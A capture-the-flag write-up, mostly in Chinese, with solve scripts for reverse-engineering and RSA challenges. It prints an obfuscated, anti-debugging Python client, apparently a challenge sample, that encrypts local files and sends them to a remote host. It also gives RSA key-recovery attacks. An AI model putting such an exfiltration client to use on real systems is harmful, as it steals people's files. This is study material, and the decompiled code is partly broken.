    for i in range(256):
        j = (j + s[i] + rc4_key[i % len(rc4_key)]) & 0xFF
        s[i], s[j] = s[j], s[i]


    i = 0
    j = 0
    decrypted = bytearray(stage2_dec[target_start:target_end])
    for index, value in enumerate(decrypted):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        decrypted[index] = value ^ s[(s[i] + s[j]) & 0xFF]
    stage2_dec[target_start:target_end] = decrypted


open("out/stage2_dec.exe", "wb").write(stage2_dec)

校验逻辑。0x408000 ... 0x408020,aes key,0x408021-408030,iv。0x31开始是密文。

模式是cbc。直接跑也跑不出来,应该是魔改了,但是能找到解密逻辑所以,,继续模拟执行吧。

PYTHON
import struct


import pefile
from unicorn import Uc
from unicorn.x86_const import *
from unicorn.unicorn_const import *


# def hook_code(mu: Uc, address: int, _size: int, user_data: dict) -> None:
#     if address == 0x404d80:
#         print("reached AES decrypt start")
#         return




stage2_dec = open("out/stage2_dec.exe", "rb").read()
stage2_dec_pe = pefile.PE(data=stage2_dec)


stage2_base = stage2_dec_pe.OPTIONAL_HEADER.ImageBase
stage2_size = (stage2_dec_pe.OPTIONAL_HEADER.SizeOfImage + 0xFFF) & ~0xFFF


mu = Uc(UC_ARCH_X86, UC_MODE_64)
mu.mem_map(stage2_base, stage2_size)
mu.mem_write(stage2_base, stage2_dec[: stage2_dec_pe.OPTIONAL_HEADER.SizeOfHeaders])
for stage2_section in stage2_dec_pe.sections:
    stage2_raw = stage2_dec[
        stage2_section.PointerToRawData : stage2_section.PointerToRawData + stage2_section.SizeOfRawData
    ]
    if stage2_raw:
        mu.mem_write(stage2_base + stage2_section.VirtualAddress, stage2_raw)


stack_base = 0x01000000
stack_size = 0x00100000
mu.mem_map(stack_base, stack_size)
stack_rsp = stack_base + stack_size - 0x4000
mu.mem_write(stack_rsp, struct.pack("<Q", 0xDEADBEEF)) # ret 2 0xDEADBEEF


scratch_base = 0x02000000
mu.mem_map(scratch_base, 0x00020000)


mydata_section = next(section for section in stage2_dec_pe.sections if section.Name.rstrip(b"\0") == b".mydata")
data = stage2_dec[
    mydata_section.PointerToRawData : mydata_section.PointerToRawData + mydata_section.SizeOfRawData
]


aes_key = data[1:33]
aes_iv = data[33:49]
ciphertext = data[49:97]
plaintext_out = scratch_base + 0x5000


mu.mem_write(scratch_base + 0x1000, ciphertext)
mu.mem_write(scratch_base + 0x2000, aes_key)
mu.mem_write(scratch_base + 0x3000, aes_iv)
mu.mem_write(stack_rsp + 0x28, struct.pack("<Q", plaintext_out))


mu.reg_write(UC_X86_REG_RSP, stack_rsp)
mu.reg_write(UC_X86_REG_RCX, scratch_base + 0x1000)
mu.reg_write(UC_X86_REG_RDX, len(ciphertext))
mu.reg_write(UC_X86_REG_R8, scratch_base + 0x2000)
mu.reg_write(UC_X86_REG_R9, scratch_base + 0x3000)
mu.emu_start(0x404d80, 0xDEADBEEF) # run to 0xDEADBEEF


plaintext = bytes(mu.mem_read(plaintext_out, len(ciphertext)))


print(plaintext.decode())

re3

pyinstaller,直接拆。拆出来pyc丢给pylingual。

PYTHON
 # Decompiled with PyLingual (https://pylingual.io)
 # Internal filename: 'client.py'
 # Bytecode version: 3.10.b1 (3439)
 # Source timestamp: 1970-01-01 00:00:00 UTC (0)
 
 import base64
 import sys
 import os
 import json
 import socket
 import hashlib
 import crypt_core
 import builtins
 def _oe(_d, _k1, _k2, _rn):
     # ***<module>._oe: Failure: Compilation Error
     try:
         _b = base64.b85decode(_d.encode())
         _r = []
         for _i, _x in enumerate(_b):
             return ((_k1, _k2, _rn), _i, 3) or ((_k1, _k2, _rn), _i, 3) or ((_k1, _k2, _rn), _i, 3) or ((_k1, _k2, _rn), _i, 3) or ((_k1, _k2, _rn), _i, 3) or ((_k1, _k2, _rn), _i, 3) or ((_k1, _k2, _rn), _i, 3) or ((_k1, _k2, _rn), _i, 3) or ((_k1, _k2, _rn), _i, 3) or ((_k1, _k2, _rn), _i, 3) or ((_k1, _k2, _rn), _i, 3) or ((_k1, _k2, _rn), _i, 3) or ((_k1, _k2, _rn),
             _r.append(_x, _k if _k else None)
         _s = bytes(_r).decode()
         _res = []
         for _c in _s:
             if _c.isalpha():
                 _base = ord('A') if _c.isupper() else ord('a')
                 _res.append((chr, ord(_c), _base, _rn, 26, _base))
             else:
                 if _c.isdigit():
                     _res.append(str(int(_c), _rn or 10))
                 else:
                     _res.append(_c)
         return ''.join(_res)
     except:
         return _d
 _globs = dict(__name__='__main__', __file__=__file__, __package__=None, _oe=_oe)
 for _k in dir(builtins):
     if not _k.startswith('_'):
         _globs[_k] = getattr(builtins, _k)
 _globs['base64'] = base64
 _globs['sys'] = sys
 _globs['os'] = os
 _globs['json'] = json
 _globs['socket'] = socket
 _globs['hashlib'] = hashlib
 _globs['crypt_core'] = crypt_core
 def _obf_check():
     if hasattr(sys, 'gettrace'):
         _tr = sys.gettrace()
         if _tr is not None:
             return False
     return True
 def _obf_exec(_code):
     # ***<module>._obf_exec: Failure: Different bytecode
     if not _obf_check():
         return None
     else:
         exec(compile, _code, chr(60) | chr(111) | chr(98) | chr(102) | chr(101) | chr(120) | chr(99))
 _1667 = 'xxxxx'
 _obf_exec(base64.b85decode(_1667).decode())

再拆

PYTHON
 _j0 = lambda: (30 ^ 126) + (520 % 26)
 _j1 = lambda: (158 ^ 184) + (820 % 54)
 _j2 = lambda: (37 ^ 2) + (687 % 25)
 _j3 = lambda: (72 ^ 112) + (474 % 30)
 _j4 = lambda: (173 ^ 82) + (257 % 73)
 _j5 = lambda: (117 ^ 203) + (331 % 54)
 _j6 = lambda: (242 ^ 46) + (846 % 33)
 _j7 = lambda: (21 ^ 148) + (425 % 77)
 _j8 = lambda: (139 ^ 134) + (427 % 21)
 _j9 = lambda: (245 ^ 62) + (413 % 85)
 _j10 = lambda: (242 ^ 65) + (892 % 30)
 _j11 = lambda: (22 ^ 58) + (740 % 59)
 _j12 = lambda: (139 ^ 248) + (771 % 74)
 _j13 = lambda: (219 ^ 230) + (262 % 63)
 _j14 = lambda: (17 ^ 89) + (622 % 38)
 _j15 = lambda: (229 ^ 205) + (369 % 25)
 _j16 = lambda: (111 ^ 33) + (433 % 50)
 _j17 = lambda: (41 ^ 142) + (512 % 21)
 
 class _Obf3776:
     def __init__(self):
         self._v = 751
     def _m(self):
         return self._v * 5
 
 #!/usr/bin/env python3
 
 import socket
 import json
 import os
 import sys
 import hashlib
 import time
 
 sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
 import crypt_core
 
 
 class CustomBase64:
     CUSTOM_ALPHABET = _oe("8<<BLok1UrR}_R>27yTmms1djUI&{(7Ls{Apm;c@eJQYZA-rTHu4po}aw559KBaUw?kHpDBVghrW#KRr", 83, 214, 17)
     STANDARD_ALPHABET = (
         _oe("0fj{dfJO_COA?e)7n4^Mo>&>3T^^WT1BYWEqGTnZX)3I6F|~Czuy#AYdpNp$J-J~b;VEk7AYtVtX5cz}", 83, 214, 17)
     )
     ENCODE_TABLE = str.maketrans(STANDARD_ALPHABET, CUSTOM_ALPHABET)
     DECODE_TABLE = str.maketrans(CUSTOM_ALPHABET, STANDARD_ALPHABET)
 
     @classmethod
     def decode(cls, data: str) -> bytes:
         import base64
 
         std_b64 = data.translate(cls.DECODE_TABLE)
         return base64.b64decode(std_b64)
 
 
 SERVER_HOST = ""
 SERVER_PORT = 9999
 KEY_B64 = _oe("C7MAupdc5tRBM!52kv4Wmp~Hle`A4N5`t?5nObY+L~6Pz5wdF*y=E$zQv!xZ", 83, 214, 17)
 KEY = CustomBase64.decode(KEY_B64)
 FILES_TO_SEND = [_oe("I-p}FvS)q0emD", 83, 214, 17), _oe("B(-BJ_<B6O", 83, 214, 17), _oe("C$MxRtZ99{emD", 83, 214, 17)]
 
 
 def _opaque_true():
     _x = 0
     for _i in range(100):
         _x += _i * (_i - _i + 1)
     return _x >= 0
 
 
 def _opaque_false():
     _a, _b = 5, 7
     return (_a * _b) == (_b * _a + 1)
 
 
 def _dead_calc():
     _dead = 0
     for _i in range(50):
         _dead = (_dead + _i) % 17
         if _dead > 100:
             _dead = _dead * 2 + 1
     return _dead
 
 
 def encrypt_file(key: bytes, plaintext: bytes) -> bytes:
     _state = 0
     _result = None
     while _state < 3:
         if _state == 0:
             if _opaque_true():
                 _result = crypt_core.encode_data(plaintext, key[:16])
                 _state = 2
             else:
                 _dead_calc()
                 _state = 1
         elif _state == 1:
             _dead_calc()
             _state = 2
         elif _state == 2:
             if _opaque_false():
                 _result = None
             _state = 3
     return _result
 
 
 def send_single_file(sock, filename, plaintext):
     _s = 0
     _ct = None
     _pl = None
     while _s < 5:
         if _s == 0:
             _ct = encrypt_file(KEY, plaintext)
             _s = 1
         elif _s == 1:
             _pl = {_oe("B&>2Jvtu`)", 83, 214, 17): filename, _oe("C#-fVpm;c-emD", 83, 214, 17): _ct.hex()}
             _s = 2
         elif _s == 2:
             if _opaque_true():
                 sock.sendall(json.dumps(_pl).encode(_oe("KfPvt;{", 83, 214, 17)) + b"\n")
                 _s = 4
             else:
                 _dead_calc()
                 _s = 3
         elif _s == 3:
             _dead_calc()
             _s = 4
         elif _s == 4:
             if not _opaque_false():
                 time.sleep(0.1)
             _s = 5
 
 
 def _verify_cmd(cmd):
     _state = 10
     _hash_val = None
     _valid = False
 
     while _state < 50:
         if _state == 10:
             if len(cmd) > 0:
                 _state = 20
             else:
                 _state = 49
         elif _state == 20:
             _hash_val = hashlib.md5(cmd.encode()).hexdigest()
             _state = 30
         elif _state == 30:
             if _opaque_true():
                 _valid = _hash_val == _oe("VWK4=qGuqYBxK?sVWlBw<RW0^B4q9&VB;re<0L2U", 83, 214, 17)
                 _state = 40
             else:
                 _dead_calc()
                 _state = 49
         elif _state == 40:
             if _valid:
                 _state = 50
             else:
                 _state = 49
         elif _state == 49:
             return False
 
     return _valid
 
 
 def _get_server_host(args):
     _s = 100
     _host = None
 
     while _s < 200:
         if _s == 100:
             if len(args) > 2:
                 _s = 110
             else:
                 _s = 120
         elif _s == 110:
             _host = args[2]
             _s = 200
         elif _s == 120:
             if _opaque_true():
                 _host = ""
             _s = 200
         elif _s == 200:
             if _opaque_false():
                 _host = _oe("Ywsm};Xh>fDF", 83, 214, 17)
             _s = 201
 
     return _host
 
 
 def main():
     _state = 0
     _sock = None
     _idx = 0
     _printed_header = False
 
     while _state < 100:
         if _state == 0:
             if _opaque_false():
                 print(_oe("2B2dm_GLArX8", 83, 214, 17))
             _state = 1
         elif _state == 1:
             if len(sys.argv) < 2:
                 _state = 5
             else:
                 _state = 2
         elif _state == 2:
             if _verify_cmd(sys.argv[1]):
                 _state = 3
             else:
                 _state = 4
         elif _state == 3:
             if not _printed_header:
                 print("=" * 50)
                 print(_oe("8K7l9zh`rSYcQZO7{6mSyk;f8F$cA4C9`^SyD5F)", 83, 214, 17))
                 print("=" * 50)
                 _printed_header = True
             _state = 10
         elif _state == 4:
             print("错误:无效的命令")
             _state = 99
         elif _state == 5:
             print("用法:python client.py <command> [SERVER_HOST]")
             _state = 99
         elif _state == 10:
             try:
                 _sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                 _state = 11
             except Exception:
                 _state = 99
         elif _state == 11:
             _host = _get_server_host(sys.argv)
             _state = 12
         elif _state == 12:
             try:
                 _sock.connect((_host, SERVER_PORT))
                 _state = 20
             except Exception as e:
                 print(f"[!] 连接失败:{e}")
                 _state = 99
         elif _state == 20:
             if _idx < len(FILES_TO_SEND):
                 _state = 21
             else:
                 _state = 30
         elif _state == 21:
             _fname = FILES_TO_SEND[_idx]
             _state = 22
         elif _state == 22:
             if os.path.exists(_fname):
                 _state = 23
             else:
                 _state = 28
         elif _state == 23:
             with open(_fname, "rb") as _f:
                 _data = _f.read()
             _state = 24
         elif _state == 24:
             if _opaque_true():
                 print(f"[*] 发送文件")
             _state = 25
         elif _state == 25:
             if not _opaque_false():
                 send_single_file(_sock, _fname, _data)
             _state = 26
         elif _state == 26:
             _idx += 1
             _state = 20
         elif _state == 28:
             print(f"[-] 文件不存在")
             _state = 29
         elif _state == 29:
             _idx += 1
             _state = 20
         elif _state == 30:
             if _opaque_true():
                 time.sleep(0.2)
             _state = 31
         elif _state == 31:
             if _sock:
                 _sock.close()
             _state = 99
         elif _state == 99:
             break
 
 
 if __name__ == _oe("42g9itaJ>C", 83, 214, 17):
     _dead_calc()
     if _opaque_true():
         main()
     else:
         _dead_calc()
 

主要问题是crypt_core.so。暴露出来只有个encode_data的接口。

拖进ida看眼,搜索发现似乎看起来是魔改sm4。然后表是后面初始化的,在0xDB80,0x

DB00,0xDBA0。

可以读到:

PYTHON
 import ctypes
 import sys
 
 class PyMethodDef(ctypes.Structure):
     _fields_ = [
         ("ml_name", ctypes.c_void_p),
         ("ml_meth", ctypes.c_void_p),
         ("ml_flags", ctypes.c_int),
         ("ml_doc", ctypes.c_void_p),
     ]
 
 
 class CyFuncObject(ctypes.Structure):
     _fields_ = [
         ("ob_refcnt", ctypes.c_ssize_t),
         ("ob_type", ctypes.c_void_p),
         ("m_ml", ctypes.POINTER(PyMethodDef)),
         ("m_self", ctypes.c_void_p),
         ("m_module", ctypes.c_void_p),
         ("vectorcall", ctypes.c_void_p),
         ("mm_class", ctypes.c_void_p),
     ]
 
 
 sys.path.insert(0, "/Users/libr/Desktop/CTF/1/pyi_extract")
 import crypt_core
 
 obj = CyFuncObject.from_address(id(crypt_core.encode_data))
 entry = obj.m_ml.contents.ml_meth
 base = entry - 0x9820
 
 db80 = ctypes.string_at(base + 0xDB80, 16)
 db00 = ctypes.string_at(base + 0xDB00, 128)
 dba0 = ctypes.string_at(base + 0xDBA0, 256)
 

然后再写个反向操作

PYTHON
 
 KEY = b"passvkcDKWLAA45o"
 
 
 def rotl32(value, shift):
     return ((value << shift) | (value >> (32 - shift))) & 0xFFFFFFFF
 
 
 def tau(value):
     return (
         DBA0[(value >> 24) & 0xFF] << 24
         | DBA0[(value >> 16) & 0xFF] << 16
         | DBA0[(value >> 8) & 0xFF] << 8
         | DBA0[value & 0xFF]
     )
 
 
 def l_transform(value):
     return value ^ rotl32(value, 2) ^ rotl32(value, 10) ^ rotl32(value, 18) ^ rotl32(value, 24)
 
 
 def l_prime_transform(value):
     return value ^ rotl32(value, 13) ^ rotl32(value, 23)
 
 
 def chunk_words(data, endian):
     out = []
     for offset in range(0, len(data), 4):
         part = data[offset : offset + 4]
         out.append(int.from_bytes(part, endian))
     return out
 
 
 def pad_pkcs7(data):
     pad = 16 - (len(data) % 16)
     if pad == 0:
         pad = 16
     return data + bytes([pad]) * pad
 
 
 def unpad_pkcs7(data):
     if not data:
         raise ValueError("empty data")
     pad = data[-1]
     if pad < 1 or pad > 16:
         raise ValueError("bad padding length")
     if data[-pad:] != bytes([pad]) * pad:
         raise ValueError("bad padding bytes")
     return data[:-pad]
 
 
 def expand_round_keys(key, fk_endian, ck_endian):
     mk = chunk_words(key, "big")
     fk = chunk_words(DB80, fk_endian)
     ck = chunk_words(DB00, ck_endian)
     state = [mk[i] ^ fk[i] for i in range(4)]
     rks = []
     for index in range(24):
         value = state[index + 1] ^ state[index + 2] ^ state[index + 3] ^ ck[index]
         value = l_prime_transform(tau(value))
         rk = state[index] ^ value
         state.append(rk)
         rks.append(rk)
     return rks
 
 
 def encrypt_block(block, rks, block_endian):
     x = chunk_words(block, block_endian)
     for rk in rks:
         value = x[-3] ^ x[-2] ^ x[-1] ^ rk
         x.append(x[-4] ^ l_transform(tau(value)))
     out = x[-1], x[-2], x[-3], x[-4]
     return b"".join(word.to_bytes(4, block_endian) for word in out)
 
 
 def decrypt_block(block, rks, block_endian):
     return encrypt_block(block, list(reversed(rks)), block_endian)
 
 
 def encrypt_ecb(data, rks, block_endian):
     padded = pad_pkcs7(data)
     out = bytearray()
     for offset in range(0, len(padded), 16):
         out.extend(encrypt_block(padded[offset : offset + 16], rks, block_endian))
     return bytes(out)
 
 
 def decrypt_ecb(data, rks, block_endian):
     if len(data) % 16 != 0:
         raise ValueError("ciphertext is not block aligned")
     out = bytearray()
     for offset in range(0, len(data), 16):
         out.extend(decrypt_block(data[offset : offset + 16], rks, block_endian))
     return unpad_pkcs7(bytes(out))
 

最后

PYTHON
 import json
 
 with open("./1.json", "r", encoding="utf-8") as handle:
     packets = json.load(handle)
 
 KEY = b"passvkcDKWLAA45o"
 
 rks = expand_round_keys(KEY, "little", "little")
 
 for p in packets:
     layers = p["_source"]["layers"]
     if "data" not in layers:
         continue
 
     payload_hex = layers["data"]["data.data"].replace(":", "")
     payload = bytes.fromhex(payload_hex)
     row = json.loads(payload)
 
     print(row)
     ciphertext = bytes.fromhex(row["ciphertext"])
     plaintext = decrypt_ecb(ciphertext, rks, "big")
     print(plaintext.decode("utf-8", errors="replace"))
 

crypto

rsa

level1

given 20 pem and we can just brute force and find (1,2),(4,15) share the same factor,

and key 6,12,17 can be factored with wiener (small d)

then just crt recover.

PYTHON
from Crypto.PublicKey import RSA
from Crypto.Cipher import AES, PKCS1_OAEP
from Crypto.Util.number import long_to_bytes
from math import gcd, isqrt
from pathlib import Path


def wiener_attack(n, e):
    def continued_fraction(num, den):
        frac = []
        while den:
            a = num // den
            frac.append(a)
            num, den = den, num - a * den
        return frac


    def convergents(frac):
        n0, d0 = frac[0], 1
        yield n0, d0
        if len(frac) == 1:
            return
        n1, d1 = frac[0] * frac[1] + 1, frac[1]
        yield n1, d1
        for a in frac[2:]:
            n0, n1 = n1, a * n1 + n0
            d0, d1 = d1, a * d1 + d0
            yield n1, d1


    frac = continued_fraction(e, n)
    for k, d in convergents(frac):
        if k == 0 or (e * d - 1) % k:
            continue
        phi = (e * d - 1) // k
        s = n - phi + 1
        disc = s * s - 4 * n
        if disc >= 0:
            t = isqrt(disc)
            if t * t == disc:
                p = (s + t) // 2
                q = (s - t) // 2
                if p * q == n:
                    return d, p, q
    return None


def build_private_keys(base):
    keys_pub = {}
    for p in Path(base).glob('key-*.pem'):
        idx = int(p.stem.split('-')[1])
        keys_pub[idx] = RSA.import_key(p.read_bytes())


    priv = {}


    # Keys 1 and 2 share a factor
    n1, n2 = keys_pub[1].n, keys_pub[2].n
    g = gcd(n1, n2)
    for idx, n in [(1, n1), (2, n2)]:
        p, q = g, n // g
        phi = (p - 1) * (q - 1)
        d = pow(keys_pub[idx].e, -1, phi)
        priv[idx] = RSA.construct((n, keys_pub[idx].e, d, p, q))


    # Keys 4 and 15 share a factor
    n4, n15 = keys_pub[4].n, keys_pub[15].n
    g = gcd(n4, n15)
    for idx, n in [(4, n4), (15, n15)]:
        p, q = g, n // g
        phi = (p - 1) * (q - 1)
        d = pow(keys_pub[idx].e, -1, phi)
        priv[idx] = RSA.construct((n, keys_pub[idx].e, d, p, q))


    # Wiener attack on keys 6, 12, 17
    for idx in [6, 12, 17]:
        result = wiener_attack(keys_pub[idx].n, keys_pub[idx].e)
        if result:
            d, p, q = result
            priv[idx] = RSA.construct((keys_pub[idx].n, keys_pub[idx].e, d, p, q))


    return keys_pub, priv


def decrypt_ciphertext(priv, pub, ciphertext):
    nbits = pub.n.bit_length()
    key_len = (nbits + 7) // 8


    if len(ciphertext) < key_len + 28:
        return None


    header = ciphertext[:key_len]
    nonce = ciphertext[key_len:key_len + 12]
    body = ciphertext[key_len + 12:-16]
    tag = ciphertext[-16:]


    try:
        if nbits >= 2048:
            # OAEP for larger keys
            sk = PKCS1_OAEP.new(priv).decrypt(header)
        else:
            # Raw RSA for smaller keys
            m = pow(int.from_bytes(header, 'big'), priv.d, priv.n)
            sk = long_to_bytes(m).rjust(16, b'\x00')


        cipher = AES.new(sk, AES.MODE_GCM, nonce=nonce)
        pt = cipher.decrypt_and_verify(body, tag)
        return pt
    except Exception:
        return None


def crt(residues, moduli):
    x = 0
    M = 1
    for a, m in zip(residues, moduli):
        t = ((a - x) % m) * pow(M, -1, m) % m
        x += M * t
        M *= m
    return x, M


base = "./level1"


print("[*] Building private keys...")
keys_pub, priv = build_private_keys(base)


cts = {}
for p in Path(base).glob('ciphertext-*.bin'):
    idx = int(p.stem.split('-')[1])
    cts[idx] = p.read_bytes()


print("[*] Decrypting ciphertexts...")
working_pairs = []
for kidx in sorted(priv):
    for cidx, ct in sorted(cts.items()):
        pt = decrypt_ciphertext(priv[kidx], keys_pub[kidx], ct)
        if pt is not None:
            working_pairs.append((cidx, kidx, priv[kidx]))
            print(f"    Key {kidx} decrypts ciphertext {cidx}")


plaintexts = {}
for cidx, kidx, priv_key in working_pairs:
    ct = cts[cidx]
    pt = decrypt_ciphertext(priv_key, keys_pub[kidx], ct)
    if pt:
        lines = pt.decode().splitlines()[1:]  # Skip header
        plaintexts[cidx] = lines
for line_no in range(9):
    residues = []
    moduli = []
    bits = None


    for cidx in sorted(plaintexts):
        d, k, b = [int(x, 16) for x in plaintexts[cidx][line_no].split(':')]
        residues.append(k)
        moduli.append(d)
        bits = b


    x, M = crt(residues, moduli)
    blen = (bits + 7) // 8


    if M.bit_length() > bits:
        msg = x.to_bytes(blen, 'big')
        print(f"{msg}")
level2

uses ed = 1 \pmod {\frac{\phi(n)}{\gcd(p-1,q-1)} } instead of ed = 1 \pmod {\phi(n)}

so Enumerate small values of g = gcd(p-1, q-1) with continued fraction.

TEXT
from math import isqrt
import hashlib


def continued_fraction(num, den):
    frac = []
    while den:
        a = num // den
        frac.append(a)
        num, den = den, num - a * den
    return frac


def convergents(frac):
    n0, d0 = frac[0], 1
    yield n0, d0
    if len(frac) == 1:
        return
    n1, d1 = frac[0] * frac[1] + 1, frac[1]
    yield n1, d1
    for a in frac[2:]:
        n0, n1 = n1, a * n1 + n0
        d0, d1 = d1, a * d1 + d0
        yield n1, d1
n = xxx
e = xxx


for g in range(2, 500, 2):
    frac = continued_fraction(g * e, n)


    for t, d in convergents(frac):
        if t == 0:
            continue


        num = e * d - 1


        if (num * g) % t:
            continue


        phi = (num * g) // t


        s = n - phi + 1


        disc = s * s - 4 * n
        if disc < 0:
            continue


        sq = isqrt(disc)
        if sq * sq != disc:
            continue


        # Recover p and q
        p = (s + sq) // 2
        q = (s - sq) // 2


        if p * q == n:
            print(f"[+] success")
            # Compute p + q
            print(f"[*] {p + q = }")


            # Compute password hash
            password = hashlib.sha256(str(p + q).encode()).hexdigest()
            print(f"[+] {password = }")
            exit(0)
level3
TEXT
leak = ((p*A) ^ (q*B) ^ ((p&q)<<64) ^ ((p|q)<<48) ^ ((p^q)*C))
       + ((p+q) mod 2^128)
       ^ ((p*q) & MASK64)

p*q mod 2^k depends on p mod 2^k and q mod 2^k, and lowbit(leak,k) also just depends on lowbit(p,k), lowbit(q,k). so we can just enumrate from the lowest bit

TEXT
from Crypto.Util.number import long_to_bytes


n = xxx
e = 65537
c = xxx
leak = xxx


A = 0xDEADBEEFCAFEBABE123456789ABCDEFFEDCBA9876543210
B = 0xCAFEBABEDEADBEEF123456789ABCDEF0123456789ABCDEF
C = 0x123456789ABCDEFFEDCBA9876543210FEDCBA987654321
MASK64 = (1 << 64) - 1
MOD128 = (1 << 128) - 1


T = n & MASK64
Y = leak ^ T


def check_leak(p, q, k):
    mod = 1 << k


    X = ((p * A) ^ (q * B) ^ (((p & q) << 64) % mod) ^
         (((p | q) << 48) % mod) ^ ((p ^ q) * C)) % mod


    S = (p + q) & MOD128


    return (X + S) % mod == Y % mod


states = [(1, 1)]


for k in range(1, 1536):
    mod = 1 << (k + 1)
    target_n = n % mod
    target_y = Y % mod


    new_states = []


    for p, q in states:
        for bp in (0, 1):
            for bq in (0, 1):
                pp = p | (bp << k)
                qq = q | (bq << k)


                if (pp * qq) % mod != target_n:
                    continue


                if not check_leak(pp, qq, k + 1):
                    continue


                new_states.append((pp, qq))


    states = new_states


p, q = states[0]
phi = (p - 1) * (q - 1)
d = pow(e, -1, phi)
m = pow(c, d, n)


flag = long_to_bytes(m)
print(f"{flag = }")

comment

留言 / 评论

如果暂时没有看到评论,请点击下方按钮重新加载。